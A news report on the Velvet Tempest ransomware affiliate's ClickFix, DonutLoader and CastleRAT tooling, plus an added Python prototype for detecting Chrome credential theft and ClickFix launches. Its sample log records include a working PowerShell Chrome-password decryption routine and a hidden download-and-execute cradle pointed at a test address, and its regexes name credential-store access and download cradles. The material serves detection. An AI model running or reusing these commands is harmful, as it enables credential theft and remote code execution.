Cybersecurity researchers have uncovered a connection between Termite ransomware intrusions and an attack chain that pairs the "ClickFix" social-engineering technique with the CastleRAT backdoor. The threat group, tracked by Microsoft as Velvet Tempest (formerly DEV-0504), has been observed deploying these tools after initial network compromise. The group has a long history as a ransomware affiliate, having been associated with Ryuk, REvil, Conti, and BlackCat/ALPHV over the past five years.
The attack methodology was documented by threat intelligence firm MalBeacon, which observed the group's activity over a 12-day period in February in an emulated environment posing as a U.S. non-profit organization. After gaining access, the attackers performed extensive hands-on-keyboard activity, including Active Directory reconnaissance and host discovery. A key part of the operation was a PowerShell script that harvested credentials saved in the Chrome browser, a step that costs the attacker nothing beyond the user's own session, since Chrome's saved passwords are protected with DPAPI and can be decrypted by any code running as that user.
This credential-harvesting script was hosted on an IP address that researchers directly linked to the tool-staging infrastructure used in Termite ransomware campaigns. The attackers also employed the ClickFix technique, a lure (typically a fake CAPTCHA or error prompt) that talks the victim into pasting and running an attacker-supplied command through built-in Windows tooling such as the Run dialog or PowerShell, to deploy the DonutLoader malware. This loader in turn installs the CastleRAT remote access trojan, providing persistent backdoor access and paving the way for ransomware deployment.
The findings highlight the evolving tactics of established ransomware affiliates, who continue to refine their post-exploitation toolkits. The infrastructure overlap is the practical takeaway: because the credential stealer sat on the same staging IP used for Termite deployments, defenders who catch the ClickFix execution or the Chrome credential theft are looking at pre-encryption activity and still have a window to act. The use of living-off-the-land binaries (LOLBins) like PowerShell for credential theft, and of a custom RAT rather than a commodity tool, underscores the need for endpoint telemetry that captures what PowerShell actually runs (script block logging, not just process starts) and for alerting on interpreters launched in ways ordinary users and administrators do not launch them.
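The two detection opportunities the article points at, the Chrome credential harvester running in PowerShell and the ClickFix-style launch of an interpreter from the Run dialog, can be prototyped as log-matching rules. The following is an added example written for this page, not code from MalBeacon, Microsoft or the reported intrusion. The log records are constructed for illustration; their field names follow Sysmon and Windows Security event conventions, but every value in them (paths, the 192.0.2.10 test address, the encoded string) is made up.

```python
"""
Hypothetical detection prototype (added example, not the page's or MalBeacon's code).

Two checks that map to the TTPs described above:
  1. PowerShell Script Block Logging (Event ID 4104) content that reads Chrome's
     credential store and carries a DPAPI/AES key-decryption step.
  2. Process-creation events (Sysmon EID 1 / Security 4688) shaped like a ClickFix
     lure: an interpreter launched from explorer.exe (the Run dialog), with a
     hidden window and an inline download-and-execute cradle.
All sample records below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# --- Check 1: browser credential harvesting inside a PowerShell script block ----
# Each indicator alone is weak (admins do touch Chrome dirs), so we require the
# credential store plus at least one signal that the data is being decrypted or read.
CHROME_STORE = re.compile(r"Google\\Chrome\\User Data\\.*?(Login Data|Local State)", re.I)
DPAPI_PRIMITIVE = re.compile(
    r"(ProtectedData\]::Unprotect|CryptUnprotectData|\bencrypted_key\b|os_crypt)", re.I)
LOGIN_TABLE = re.compile(r"(FROM\s+logins|password_value|origin_url)", re.I)

@dataclass
class Finding:
    rule: str
    record_id: str
    evidence: list = field(default_factory=list)

def check_script_block(event: dict) -> Optional[Finding]:
    """Flag an EID 4104 record whose ScriptBlockText touches Chrome's Login Data /
    Local State and also decrypts or queries it. Returns None for ordinary admin use."""
    text = event.get("ScriptBlockText", "")
    hits = [name for name, rx in (("chrome_store", CHROME_STORE),
                                  ("dpapi_or_key", DPAPI_PRIMITIVE),
                                  ("logins_table", LOGIN_TABLE)) if rx.search(text)]
    if "chrome_store" in hits and len(hits) >= 2:
        return Finding("browser_credential_harvest_ps", event["RecordId"], hits)
    return None

# --- Check 2: ClickFix-shaped process creation ----------------------------------
# A ClickFix victim pastes the command into the Run dialog, so the interpreter's
# parent is explorer.exe rather than an Office app, browser or script host. The
# pasted command hides its window and fetches or decodes a second stage.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bcurl\b|DownloadString|Net\.WebClient|"
    r"Invoke-Expression|\biex\b|mshta\s+https?://)", re.I)
ENCODED_CMD = re.compile(r"-e(ncodedcommand|nc)?\s+[A-Za-z0-9+/=]{20,}", re.I)

def check_process_creation(event: dict) -> Optional[Finding]:
    """Flag an interpreter spawned by explorer.exe whose command line also shows a
    hidden window, a download cradle, or an encoded command. A bare shell started
    from the Run dialog is normal user behaviour and is not flagged."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    if image not in INTERPRETERS or parent != "explorer.exe":
        return None
    hits = [name for name, rx in (("hidden_window", HIDDEN_WINDOW),
                                  ("download_cradle", DOWNLOAD_CRADLE),
                                  ("encoded_command", ENCODED_CMD)) if rx.search(cmd)]
    if hits:
        return Finding("clickfix_run_dialog_execution", event["RecordId"], hits)
    return None

def scan(events: list) -> list:
    """Route each record to the check for its event type and collect findings."""
    findings = []
    for ev in events:
        check = check_script_block if ev.get("EventId") == 4104 else check_process_creation
        f = check(ev)
        if f:
            findings.append(f)
    return findings

# Constructed sample records: ps-1 and proc-1 should fire, the rest should not.
SAMPLE_EVENTS = [
    {"EventId": 4104, "RecordId": "ps-1", "ScriptBlockText": (
        'Copy-Item "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data" $env:TEMP\\ld.db; '
        '$state = Get-Content "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Local State" | ConvertFrom-Json; '
        '$key = [Security.Cryptography.ProtectedData]::Unprotect('
        '[Convert]::FromBase64String($state.os_crypt.encrypted_key)[5..9999], $null, 0); '
        'SELECT origin_url, username_value, password_value FROM logins')},
    {"EventId": 4104, "RecordId": "ps-2",  # cache cleanup: touches Chrome, no credential access
     "ScriptBlockText": 'Remove-Item "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cache\\*" -Recurse'},
    {"EventId": 1, "RecordId": "proc-1", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://192.0.2.10/verify.ps1 -UseBasicParsing | iex"'},
    {"EventId": 1, "RecordId": "proc-2", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell"},
    {"EventId": 1, "RecordId": "proc-3", "Image": "C:\\Windows\\System32\\cmd.exe",  # Office-spawned: out of scope here
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "cmd /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:<34} {f.record_id:<8} {', '.join(f.evidence)}")
```

Both checks deliberately require a combination of signals rather than a single string, because the individual pieces (a Chrome path, `powershell.exe` under `explorer.exe`) are everyday noise. Check 1 only works if Script Block Logging is enabled; a process-creation event alone would show `powershell.exe` and nothing about the Chrome store. Check 2 is scoped to the Run-dialog shape of ClickFix; the `proc-3` record shows that an Office-spawned interpreter needs its own rule.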